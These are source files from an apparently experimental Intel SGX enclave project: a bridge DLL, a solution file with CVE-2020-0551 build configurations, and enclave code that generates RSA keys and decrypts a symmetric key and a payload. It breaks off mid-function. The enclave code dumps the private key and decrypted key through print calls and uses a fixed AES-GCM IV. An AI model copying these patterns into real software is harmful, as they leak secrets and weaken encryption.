| int check = 0; 124 | 125 | cout << "Checking platform capability... " << endl; 126 | if (checkECapability() == CANNOT_CONTINUE) { 127 | return CANNOT_CONTINUE; 128 | } 129 | 130 | cout << "Enabling SGX via EFI ... " << endl; 131 | if (enableSGXEFI() == CANNOT_CONTINUE) { 132 | return CANNOT_CONTINUE; 133 | } 134 | 135 | cout << "Creating SGX enclave " << endl; 136 | eid = createEnclave(enclaveSignedFile); 137 | if (eid == CANNOT_CONTINUE) { 138 | return CANNOT_CONTINUE; 139 | } 140 | return eid; 141 | } 142 | extern "C" int genPair(uint64_t eid, char** public_key_full) { 143 | 144 | char* public_key_struct = NULL; 145 | char* public_key_raw = NULL; 146 | 147 | public_key_struct = (char*)malloc( 148 | (static_cast(SGX_RSA3072_KEY_SIZE) + SGX_RSA3072_PUB_EXP_SIZE)); 149 | if (public_key_struct == NULL) { 150 | cout << "B: Error: public key malloc() failed" << endl; 151 | return CANNOT_CONTINUE; 152 | } 153 | 154 | public_key_raw = (char*)malloc(SGX_RSA3072_KEY_SIZE); 155 | if (public_key_raw == NULL) { 156 | cout << "B: Error: public key (raw) malloc() failed" << endl; 157 | return CANNOT_CONTINUE; 158 | } 159 | 160 | cout << "B: Generating keys ... " << std::endl; 161 | ret = createRsaKeyPairEcall(eid, public_key_raw, public_key_struct); 162 | if (ret != SGX_SUCCESS) 163 | { 164 | cout << "B: Key Generation failed." << endl; 165 | print_error_message(ret); 166 | return CANNOT_CONTINUE; 167 | } 168 | 169 | cout << "B: Public key (Raw):" << std::endl; 170 | DumpHex(public_key_raw, SGX_RSA3072_KEY_SIZE); 171 | // std::cout << "B: Writing pub key" << std::endl; 172 | // WriteBufFile("e.pub", public_key_struct, (static_cast(SGX_RSA3072_KEY_SIZE) + SGX_RSA3072_PUB_EXP_SIZE)); 173 | 174 | // Allocate key(pub) return buffer 175 | *public_key_full = (char*)malloc( 176 | (static_cast(SGX_RSA3072_KEY_SIZE) + SGX_RSA3072_PUB_EXP_SIZE)); 177 | if (public_key_full == NULL) { 178 | cout << "B: Error: public key response malloc() failed" << endl; 179 | return CANNOT_CONTINUE; 180 | } 181 | 182 | memcpy(*public_key_full, public_key_struct, sizeof(sgx_rsa3072_public_key_t)); 183 | cout << "B: public_key_full" << endl; 184 | DumpHex(*public_key_full, (static_cast(SGX_RSA3072_KEY_SIZE) + SGX_RSA3072_PUB_EXP_SIZE)); 185 | 186 | // TODO: check more 187 | /*if (sizeof(public_key_full) != sizeof(sgx_rsa3072_key_t)) { 188 | cout << "B: Error: public key response copy failed" << endl; 189 | return CANNOT_CONTINUE; 190 | }*/ 191 | 192 | /* sgx_rsa3072_public_key_t* public_key_struct = (sgx_rsa3072_public_key_t*)malloc(sizeof(sgx_rsa3072_public_key_t)); 193 | if (public_key_struct != NULL) { 194 | memcpy(public_key_struct, public_key, sizeof(sgx_rsa3072_public_key_t)); 195 | buf2hex(public_key_struct->exp, SGX_RSA3072_PUB_EXP_SIZE); 196 | buf2hex(public_key_struct->mod, SGX_RSA3072_KEY_SIZE); 197 | } 198 | */ 199 | 200 | return CAN_CONTINUE; 201 | } 202 | 203 | extern "C" int storeSymKey(uint64_t eid, unsigned char* encData) { 204 | 205 | if (NULL == encData) { 206 | cout << "Enc data is null" << endl; 207 | return CANNOT_CONTINUE; 208 | } 209 | // DumpHex(encData, SGX_RSA3072_KEY_SIZE); 210 | 211 | size_t len = (size_t)SGX_RSA3072_KEY_SIZE; 212 | ret = storeSymKeyEcall(eid, encData, len); 213 | if (ret != SGX_SUCCESS) 214 | { 215 | print_error_message(ret); 216 | return CANNOT_CONTINUE; 217 | } 218 | return CAN_CONTINUE; 219 | } 220 | 221 | extern "C" int decryptPayload(uint64_t eid, unsigned char* encData, size_t encDataLen, unsigned char* mac) { 222 | 223 | if (NULL == encData || NULL == mac) { 224 | cout << "Enc data or MAC are null" << endl; 225 | return CANNOT_CONTINUE; 226 | } 227 | cout << "B: Data:" << endl; 228 | DumpHex(encData, encDataLen); 229 | 230 | cout << "B: MAC:" << endl; 231 | DumpHex(mac, 16); 232 | 233 | ret = decryptPayloadEcall(eid, encData, encDataLen, mac); 234 | if (ret != SGX_SUCCESS) 235 | { 236 | print_error_message(ret); 237 | return CANNOT_CONTINUE; 238 | } 239 | 240 | return CAN_CONTINUE; 241 | } 242 | 243 | 244 | extern "C" int destageEnclave(uint64_t eid) { 245 | ret = SGX_ERROR_UNEXPECTED; 246 | 247 | ret = sgx_destroy_enclave(eid); 248 | if (ret != SGX_SUCCESS) 249 | { 250 | print_error_message(ret); 251 | return CANNOT_CONTINUE; 252 | } 253 | return CAN_CONTINUE; 254 | } 255 | 256 | BOOL APIENTRY DllMain( HMODULE hModule, 257 | DWORD ul_reason_for_call, 258 | LPVOID lpReserved 259 | ) 260 | { 261 | switch (ul_reason_for_call) 262 | { 263 | case DLL_PROCESS_ATTACH: 264 | break; 265 | case DLL_THREAD_ATTACH: 266 | break; 267 | case DLL_THREAD_DETACH: 268 | break; 269 | case DLL_PROCESS_DETACH: 270 | break; 271 | } 272 | return TRUE; 273 | } 274 | 275 | -------------------------------------------------------------------------------- /Enclave2.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.31005.135 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Enclave2", "Enclave2\Enclave2.vcxproj", "{DD541470-E8B8-4E4A-B50A-BB76DF45BCBA}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "App", "App\App.vcxproj", "{C198E4D9-1292-4730-A24E-5AA31C1AFD44}" 9 | EndProject 10 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Bridge", "Bridge\Bridge.vcxproj", "{2CFD429D-FF7F-4F49-A8CB-07C00214F316}" 11 | EndProject 12 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{3C74DF09-3730-4547-A16B-A0D64C5FA729}" 13 | ProjectSection(SolutionItems) = preProject 14 | Docs\Readme.md = Docs\Readme.md 15 | Docs\UncleAbe.png = Docs\UncleAbe.png 16 | EndProjectSection 17 | EndProject 18 | Global 19 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 20 | CVE-2020-0551-CF-Prerelease|x64 = CVE-2020-0551-CF-Prerelease|x64 21 | CVE-2020-0551-CF-Prerelease|x86 = CVE-2020-0551-CF-Prerelease|x86 22 | CVE-2020-0551-CF-Release|x64 = CVE-2020-0551-CF-Release|x64 23 | CVE-2020-0551-CF-Release|x86 = CVE-2020-0551-CF-Release|x86 24 | CVE-2020-0551-Load-Prerelease|x64 = CVE-2020-0551-Load-Prerelease|x64 25 | CVE-2020-0551-Load-Prerelease|x86 = CVE-2020-0551-Load-Prerelease|x86 26 | CVE-2020-0551-Load-Release|x64 = CVE-2020-0551-Load-Release|x64 27 | CVE-2020-0551-Load-Release|x86 = CVE-2020-0551-Load-Release|x86 28 | Debug|x64 = Debug|x64 29 | Debug|x86 = Debug|x86 30 | Prerelease|x64 = Prerelease|x64 31 | Prerelease|x86 = Prerelease|x86 32 | Release|x64 = Release|x64 33 | Release|x86 = Release|x86 34 | Simulation|x64 = Simulation|x64 35 | Simulation|x86 = Simulation|x86 36 | EndGlobalSection 37 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 38 | {DD541470-E8B8-4E4A-B50A-BB76DF45BCBA}.CVE-2020-0551-CF-Prerelease|x64.ActiveCfg = CVE-2020-0551-CF-Prerelease|x64 39 | {DD541470-E8B8-4E4A-B50A-BB76DF45BCBA}.CVE-2020-0551-CF-Prerelease|x64.Build.0 = CVE-2020-0551-CF-Prerelease|x64 40 | {DD541470-E8B8-4E4A-B50A-BB76DF45BCBA}.CVE-2020-0551-CF-Prerelease|x86.ActiveCfg = CVE-2020-0551-CF-Prerelease|x64 41 | {DD541470-E8B8-4E4A-B50A-BB76DF45BCBA}.CVE-2020-0551-CF-Release|x64.ActiveCfg = CVE-2020-0551-CF-Release|x64 42 | {DD541470-E8B8-4E4A-B50A-BB76DF45BCBA}.CVE-2020-0551-CF-Release|x64.Build.0 = CVE-2020-0551-CF-Release|x64 43 | {DD541470-E8B8-4E4A-B50A-BB76DF45BCBA}.CVE-2020-0551-CF-Release|x86.ActiveCfg = CVE-2020-0551-CF-Release|x64 44 | {DD541470-E8B8-4E4A-B50A-BB76DF45BCBA}.CVE-2020-0551-Load-Prerelease|x64.ActiveCfg = CVE-2020-0551-Load-Prerelease|x64 45 | {DD541470-E8B8-4E4A-B50A-BB76DF45BCBA}.CVE-2020-0551-Load-Prerelease|x64.Build.0 = CVE-2020-0551-Load-Prerelease|x64 46 | {DD541470-E8B8-4E4A-B50A-BB76DF45BCBA}.CVE-2020-0551-Load-Prerelease|x86.ActiveCfg = CVE-2020-0551-Load-Prerelease|x64 47 | {DD541470-E8B8-4E4A-B50A-BB76DF45BCBA}.CVE-2020-0551-Load-Release|x64.ActiveCfg = CVE-2020-0551-Load-Release|x64 48 | {DD541470-E8B8-4E4A-B50A-BB76DF45BCBA}.CVE-2020-0551-Load-Release|x64.Build.0 = CVE-2020-0551-Load-Release|x64 49 | {DD541470-E8B8-4E4A-B50A-BB76DF45BCBA}.CVE-2020-0551-Load-Release|x86.ActiveCfg = CVE-2020-0551-Load-Release|x64 50 | {DD541470-E8B8-4E4A-B50A-BB76DF45BCBA}.Debug|x64.ActiveCfg = Debug|x64 51 | {DD541470-E8B8-4E4A-B50A-BB76DF45BCBA}.Debug|x64.Build.0 = Debug|x64 52 | {DD541470-E8B8-4E4A-B50A-BB76DF45BCBA}.Debug|x86.ActiveCfg = Debug|Win32 53 | {DD541470-E8B8-4E4A-B50A-BB76DF45BCBA}.Debug|x86.Build.0 = Debug|Win32 54 | {DD541470-E8B8-4E4A-B50A-BB76DF45BCBA}.Prerelease|x64.ActiveCfg = Prerelease|x64 55 | {DD541470-E8B8-4E4A-B50A-BB76DF45BCBA}.Prerelease|x64.Build.0 = Prerelease|x64 56 | {DD541470-E8B8-4E4A-B50A-BB76DF45BCBA}.Prerelease|x86.ActiveCfg = Prerelease|Win32 57 | {DD541470-E8B8-4E4A-B50A-BB76DF45BCBA}.Prerelease|x86.Build.0 = Prerelease|Win32 58 | {DD541470-E8B8-4E4A-B50A-BB76DF45BCBA}.Release|x64.ActiveCfg = Release|x64 59 | {DD541470-E8B8-4E4A-B50A-BB76DF45BCBA}.Release|x64.Build.0 = Release|x64 60 | {DD541470-E8B8-4E4A-B50A-BB76DF45BCBA}.Release|x86.ActiveCfg = Release|Win32 61 | {DD541470-E8B8-4E4A-B50A-BB76DF45BCBA}.Release|x86.Build.0 = Release|Win32 62 | {DD541470-E8B8-4E4A-B50A-BB76DF45BCBA}.Simulation|x64.ActiveCfg = Simulation|x64 63 | {DD541470-E8B8-4E4A-B50A-BB76DF45BCBA}.Simulation|x64.Build.0 = Simulation|x64 64 | {DD541470-E8B8-4E4A-B50A-BB76DF45BCBA}.Simulation|x86.ActiveCfg = Simulation|Win32 65 | {DD541470-E8B8-4E4A-B50A-BB76DF45BCBA}.Simulation|x86.Build.0 = Simulation|Win32 66 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.CVE-2020-0551-CF-Prerelease|x64.ActiveCfg = Debug|x64 67 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.CVE-2020-0551-CF-Prerelease|x64.Build.0 = Debug|x64 68 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.CVE-2020-0551-CF-Prerelease|x86.ActiveCfg = Debug|Win32 69 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.CVE-2020-0551-CF-Prerelease|x86.Build.0 = Debug|Win32 70 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.CVE-2020-0551-CF-Release|x64.ActiveCfg = Release|x64 71 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.CVE-2020-0551-CF-Release|x64.Build.0 = Release|x64 72 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.CVE-2020-0551-CF-Release|x86.ActiveCfg = Release|Win32 73 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.CVE-2020-0551-CF-Release|x86.Build.0 = Release|Win32 74 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.CVE-2020-0551-Load-Prerelease|x64.ActiveCfg = Debug|x64 75 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.CVE-2020-0551-Load-Prerelease|x64.Build.0 = Debug|x64 76 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.CVE-2020-0551-Load-Prerelease|x86.ActiveCfg = Debug|Win32 77 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.CVE-2020-0551-Load-Prerelease|x86.Build.0 = Debug|Win32 78 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.CVE-2020-0551-Load-Release|x64.ActiveCfg = Release|x64 79 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.CVE-2020-0551-Load-Release|x64.Build.0 = Release|x64 80 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.CVE-2020-0551-Load-Release|x86.ActiveCfg = Release|Win32 81 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.CVE-2020-0551-Load-Release|x86.Build.0 = Release|Win32 82 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.Debug|x64.ActiveCfg = Debug|x64 83 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.Debug|x64.Build.0 = Debug|x64 84 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.Debug|x86.ActiveCfg = Debug|Win32 85 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.Debug|x86.Build.0 = Debug|Win32 86 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.Prerelease|x64.ActiveCfg = Prerelease|x64 87 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.Prerelease|x64.Build.0 = Prerelease|x64 88 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.Prerelease|x86.ActiveCfg = Prerelease|Win32 89 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.Prerelease|x86.Build.0 = Prerelease|Win32 90 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.Release|x64.ActiveCfg = Release|x64 91 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.Release|x64.Build.0 = Release|x64 92 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.Release|x86.ActiveCfg = Release|Win32 93 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.Release|x86.Build.0 = Release|Win32 94 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.Simulation|x64.ActiveCfg = Simulation|x64 95 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.Simulation|x64.Build.0 = Simulation|x64 96 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.Simulation|x86.ActiveCfg = Simulation|Win32 97 | {C198E4D9-1292-4730-A24E-5AA31C1AFD44}.Simulation|x86.Build.0 = Simulation|Win32 98 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.CVE-2020-0551-CF-Prerelease|x64.ActiveCfg = Debug|x64 99 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.CVE-2020-0551-CF-Prerelease|x64.Build.0 = Debug|x64 100 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.CVE-2020-0551-CF-Prerelease|x86.ActiveCfg = Debug|Win32 101 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.CVE-2020-0551-CF-Prerelease|x86.Build.0 = Debug|Win32 102 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.CVE-2020-0551-CF-Release|x64.ActiveCfg = Release|x64 103 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.CVE-2020-0551-CF-Release|x64.Build.0 = Release|x64 104 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.CVE-2020-0551-CF-Release|x86.ActiveCfg = Release|Win32 105 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.CVE-2020-0551-CF-Release|x86.Build.0 = Release|Win32 106 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.CVE-2020-0551-Load-Prerelease|x64.ActiveCfg = Debug|x64 107 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.CVE-2020-0551-Load-Prerelease|x64.Build.0 = Debug|x64 108 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.CVE-2020-0551-Load-Prerelease|x86.ActiveCfg = Debug|Win32 109 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.CVE-2020-0551-Load-Prerelease|x86.Build.0 = Debug|Win32 110 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.CVE-2020-0551-Load-Release|x64.ActiveCfg = Release|x64 111 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.CVE-2020-0551-Load-Release|x64.Build.0 = Release|x64 112 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.CVE-2020-0551-Load-Release|x86.ActiveCfg = Release|Win32 113 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.CVE-2020-0551-Load-Release|x86.Build.0 = Release|Win32 114 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.Debug|x64.ActiveCfg = Debug|x64 115 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.Debug|x64.Build.0 = Debug|x64 116 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.Debug|x86.ActiveCfg = Debug|Win32 117 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.Debug|x86.Build.0 = Debug|Win32 118 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.Prerelease|x64.ActiveCfg = Prerelease|x64 119 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.Prerelease|x64.Build.0 = Prerelease|x64 120 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.Prerelease|x86.ActiveCfg = Prerelease|Win32 121 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.Prerelease|x86.Build.0 = Prerelease|Win32 122 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.Release|x64.ActiveCfg = Release|x64 123 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.Release|x64.Build.0 = Release|x64 124 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.Release|x86.ActiveCfg = Release|Win32 125 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.Release|x86.Build.0 = Release|Win32 126 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.Simulation|x64.ActiveCfg = Simulation|x64 127 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.Simulation|x64.Build.0 = Simulation|x64 128 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.Simulation|x86.ActiveCfg = Simulation|Win32 129 | {2CFD429D-FF7F-4F49-A8CB-07C00214F316}.Simulation|x86.Build.0 = Simulation|Win32 130 | EndGlobalSection 131 | GlobalSection(SolutionProperties) = preSolution 132 | HideSolutionNode = FALSE 133 | EndGlobalSection 134 | GlobalSection(ExtensibilityGlobals) = postSolution 135 | SolutionGuid = {10654EEB-91D4-43E1-91B7-2454906FCF8E} 136 | EndGlobalSection 137 | EndGlobal 138 | -------------------------------------------------------------------------------- /Enclave2/Enclave2.cpp: -------------------------------------------------------------------------------- 1 | #include "sgx_trts.h" 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #include "Enclave2.h" 10 | #include "Enclave2_t.h" 11 | 12 | 13 | // Warning C26812 The enum type is unscoped. 14 | #pragma warning( disable : 26812 ) 15 | 16 | void* private_key_raw = NULL; // Asymmetric Key(pri) 17 | void* public_key_raw = NULL; // Asymmetric Key(pub) 18 | char* sym_shared_key = NULL; // Symmetric Key 19 | 20 | void eprintf(const char* fmt, ...) 21 | { 22 | const short BSZ = 256; 23 | char buf[BSZ] = { '\0' }; 24 | va_list ap; 25 | va_start(ap, fmt); 26 | vsnprintf(buf, BSZ, fmt, ap); 27 | va_end(ap); 28 | ocall_print(buf); 29 | } 30 | int ecall_do_trusted_inside_ocall(void) { 31 | return TRUE; 32 | } 33 | int ecall_do_trusted(int check) 34 | { 35 | if (check) 36 | return TRUE; 37 | else 38 | return FALSE; 39 | } 40 | void DumpHex(const void* data, size_t size) { 41 | char ascii[17]; 42 | size_t i, j; 43 | ascii[16] = '\0'; 44 | for (i = 0; i < size; ++i) { 45 | eprintf("%02X ", ((unsigned char*)data)[i]); 46 | if (((unsigned char*)data)[i] >= ' ' && ((unsigned char*)data)[i] <= '~') { 47 | ascii[i % 16] = ((unsigned char*)data)[i]; 48 | } 49 | else { 50 | ascii[i % 16] = '.'; 51 | } 52 | if ((i + 1) % 8 == 0 || i + 1 == size) { 53 | eprintf(" "); 54 | if ((i + 1) % 16 == 0) { 55 | eprintf("| %s \n", ascii); 56 | } 57 | else if (i + 1 == size) { 58 | ascii[(i + 1) % 16] = '\0'; 59 | if ((i + 1) % 16 <= 8) { 60 | eprintf(" "); 61 | } 62 | for (j = (i + 1) % 16; j < 16; ++j) { 63 | eprintf(" "); 64 | } 65 | eprintf("| %s \n", ascii); 66 | } 67 | } 68 | } 69 | } 70 | void createRsaKeyPairEcall(char* public_key_raw_out, char* public_key_out) { 71 | 72 | /* Public key is allocated with 73 | * uint8_t mod[SGX_RSA3072_KEY_SIZE]; 74 | * uint8_t exp[SGX_RSA3072_PUB_EXP_SIZE]; 75 | */ 76 | sgx_rsa3072_key_t* private_key = (sgx_rsa3072_key_t*)malloc(sizeof(sgx_rsa3072_key_t)); 77 | sgx_rsa3072_public_key_t* public_key = (sgx_rsa3072_public_key_t*)malloc(sizeof(sgx_rsa3072_public_key_t)); 78 | 79 | 80 | sgx_status_t status = createRsaKeyPair(public_key, private_key, &public_key_raw, &private_key_raw); 81 | 82 | memcpy(public_key_raw_out, public_key_raw, SGX_RSA3072_KEY_SIZE); 83 | memcpy(public_key_out, public_key, sizeof(sgx_rsa3072_public_key_t)); 84 | 85 | eprintf("E: Private key raw (gen):\n"); 86 | DumpHex(private_key_raw, SGX_RSA3072_KEY_SIZE); 87 | 88 | eprintf("E: Public key raw (gen):\n"); 89 | DumpHex(public_key_raw, SGX_RSA3072_KEY_SIZE); 90 | 91 | } 92 | 93 | 94 | sgx_status_t createRsaKeyPair( 95 | sgx_rsa3072_public_key_t* public_key, sgx_rsa3072_key_t* private_key, void** public_key_raw, void** private_key_raw) { 96 | 97 | int e_byte_size = SGX_RSA3072_PUB_EXP_SIZE; 98 | int n_byte_size = SGX_RSA3072_KEY_SIZE; 99 | unsigned char* p_n = (unsigned char*)malloc(SGX_RSA3072_KEY_SIZE); 100 | unsigned char* p_d = (unsigned char*)malloc(SGX_RSA3072_PRI_EXP_SIZE); 101 | unsigned char p_e[] = { 0x01, 0x00, 0x01, 0x00 }; //65537 - a common exp 102 | unsigned char* p_p = (unsigned char*)malloc(SGX_RSA3072_KEY_SIZE); 103 | unsigned char* p_q = (unsigned char*)malloc(SGX_RSA3072_KEY_SIZE); 104 | unsigned char* p_dmp1 = (unsigned char*)malloc(SGX_RSA3072_KEY_SIZE); 105 | unsigned char* p_dmq1 = (unsigned char*)malloc(SGX_RSA3072_KEY_SIZE); 106 | unsigned char* p_iqmp = (unsigned char*)malloc(SGX_RSA3072_KEY_SIZE); 107 | 108 | 109 | sgx_status_t status = SGX_ERROR_UNEXPECTED; 110 | status = sgx_create_rsa_key_pair( 111 | n_byte_size, 112 | e_byte_size, 113 | p_n, 114 | p_d, 115 | p_e, 116 | p_p, 117 | p_q, 118 | p_dmp1, 119 | p_dmq1, 120 | p_iqmp 121 | ); 122 | if (status != SGX_SUCCESS) { 123 | ocall_print("Rsa Key Pair creation error!\n"); 124 | return status; 125 | } 126 | else { 127 | ocall_print("RSA Generated Succesfully!\n"); 128 | } 129 | 130 | // Populate Key(priv) struct 131 | memcpy(private_key->mod, p_n, n_byte_size); 132 | memcpy(private_key->d, p_d, n_byte_size); 133 | memcpy(private_key->e, p_e, e_byte_size); 134 | 135 | // Populate Key(pub) struct 136 | memcpy(public_key->mod, p_n, n_byte_size); 137 | memcpy(public_key->exp, p_e, e_byte_size); 138 | 139 | // Create Key(pub) 140 | status = sgx_create_rsa_pub1_key( 141 | SGX_RSA3072_KEY_SIZE, 142 | SGX_RSA3072_PUB_EXP_SIZE, 143 | (const unsigned char*)public_key->mod, 144 | (const unsigned char*)public_key->exp, 145 | public_key_raw); 146 | if (status != SGX_SUCCESS) { 147 | ocall_print("Error in creating void** rsapubkey!\n"); 148 | if (status == SGX_ERROR_INVALID_PARAMETER) { 149 | ocall_print("Invalid parameters\n"); 150 | return status; 151 | } 152 | if (status == SGX_ERROR_UNEXPECTED) { 153 | ocall_print("Unexpected error\n"); 154 | return status; 155 | } 156 | } 157 | else { 158 | ocall_print("Key(pub) created.\n"); 159 | } 160 | 161 | // Create Key(pri) 162 | status = sgx_create_rsa_priv2_key( 163 | SGX_RSA3072_KEY_SIZE, 164 | SGX_RSA3072_PUB_EXP_SIZE, 165 | p_e, 166 | p_p, 167 | p_q, 168 | p_dmp1, 169 | p_dmq1, 170 | p_iqmp, 171 | private_key_raw); 172 | if (status != SGX_SUCCESS) { 173 | ocall_print("Error in creating void** rsaprivkey!\n"); 174 | if (status == SGX_ERROR_INVALID_PARAMETER) { 175 | ocall_print("Invalid parameters\n"); 176 | return status; 177 | } 178 | if (status == SGX_ERROR_UNEXPECTED) { 179 | ocall_print("Unexpected error\n"); 180 | return status; 181 | } 182 | } 183 | else { 184 | ocall_print("Key(pri) created.\n"); 185 | } 186 | 187 | 188 | if (NULL != p_dmp1 || 189 | NULL != p_dmq1 || 190 | NULL != p_iqmp || 191 | NULL != p_n || 192 | NULL != p_d || 193 | NULL != p_p || 194 | NULL != p_q 195 | ) { 196 | free(p_dmp1); 197 | free(p_dmq1); 198 | free(p_iqmp); 199 | free(p_n); 200 | free(p_d); 201 | free(p_p); 202 | free(p_q); 203 | } 204 | 205 | return SGX_SUCCESS; 206 | } 207 | 208 | void decryptPayloadGetSizeEcall(unsigned char* encryptedData, size_t encryptedDataSize, size_t* decrypted_data_size) { 209 | 210 | // eprintf("Enc dat size:"); 211 | // DumpHex((char *) encryptedDataSize, 1); 212 | size_t* dec_d_s = 0; 213 | 214 | sgx_status_t status = sgx_rsa_priv_decrypt_sha256( 215 | private_key_raw, 216 | NULL, 217 | dec_d_s, 218 | //decrypted_data_size, 219 | encryptedData, 220 | encryptedDataSize); 221 | if (status != SGX_SUCCESS) { 222 | eprintf("%s %d", "Determination of output length failed\n", status); 223 | return; 224 | } 225 | } 226 | 227 | void storeSymKeyEcall(unsigned char* encryptedData, size_t encryptedDataSize) { 228 | 229 | unsigned char* decryptedMessage = storeSymKey(encryptedData, encryptedDataSize); 230 | if (decryptedMessage != NULL) { 231 | sym_shared_key = (char*) malloc(sym_shared_key_size); 232 | memcpy(sym_shared_key, decryptedMessage, sym_shared_key_size); 233 | eprintf("%s\n", sym_shared_key); 234 | DumpHex(decryptedMessage, sym_shared_key_size); 235 | } 236 | } 237 | 238 | unsigned char* storeSymKey(unsigned char* encryptedData, size_t encryptedDataSize) { 239 | 240 | sgx_status_t status; 241 | size_t decrypted_data_length = 384; 242 | size_t decrypted_data_real_sz; 243 | 244 | eprintf("e: Encrypted data:\n"); 245 | DumpHex(encryptedData, encryptedDataSize); 246 | //eprintf("e: Private key:"); 247 | // DumpHex(private_key_raw, SGX_RSA3072_KEY_SIZE); 248 | 249 | unsigned char* decrypted_data = (unsigned char*)malloc(decrypted_data_length); 250 | 251 | status = sgx_rsa_priv_decrypt_sha256( 252 | private_key_raw, 253 | (unsigned char*)decrypted_data, 254 | &decrypted_data_length, 255 | (unsigned char*)encryptedData, 256 | encryptedDataSize); 257 | 258 | if (status != SGX_SUCCESS) { 259 | eprintf("Error in decrypting using private key! "); 260 | eprintf("status: %d\n", status); 261 | return NULL; 262 | } 263 | else { 264 | eprintf("Decrypted!\n"); 265 | // check size 266 | decrypted_data_real_sz = strlen((char*)decrypted_data); 267 | DumpHex(decrypted_data, decrypted_data_real_sz); 268 | 269 | if (decrypted_data_real_sz != sym_shared_key_size) { 270 | eprintf("Size of decrypted symkey is != 16 : %d\n", decrypted_data_real_sz); 271 | return NULL; 272 | } 273 | } 274 | return decrypted_data; 275 | } 276 | 277 | void decryptPayloadEcall(unsigned char* encryptedData, size_t encryptedDataSize, unsigned char* mac) { 278 | 279 | eprintf("%s\n", "E: Data"); 280 | DumpHex(encryptedData, encryptedDataSize); 281 | eprintf("%s\n", "E: MAC"); 282 | DumpHex(mac, 16); 283 | unsigned char* decryptedPayload = decryptPayload(encryptedData, encryptedDataSize, mac); 284 | if (decryptedPayload != NULL) { 285 | DumpHex(decryptedPayload, encryptedDataSize); 286 | } 287 | } 288 | 289 | unsigned char* decryptPayload(unsigned char* encryptedData, size_t encryptedDataSize, unsigned char* mac){ 290 | sgx_status_t ret = SGX_SUCCESS; 291 | sgx_aes_gcm_128bit_tag_t* mac2 = (sgx_aes_gcm_128bit_tag_t*) mac; 292 | uint8_t iv[12] = { 293 | 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0A, 0x0B, 0x0C 294 | }; 295 | 296 | // eprintf("IV: %02x\n", iv); 297 | // eprintf("--- %s --- \n", "Encrypting"); 298 | // // Gen IV 299 | // /* 300 | // sgx_read_rand(reinterpret_cast(&iv), 301 | // sizeof(iv)); 302 | // eprintf("E: iv: %02x \n", iv); 303 | // */ 304 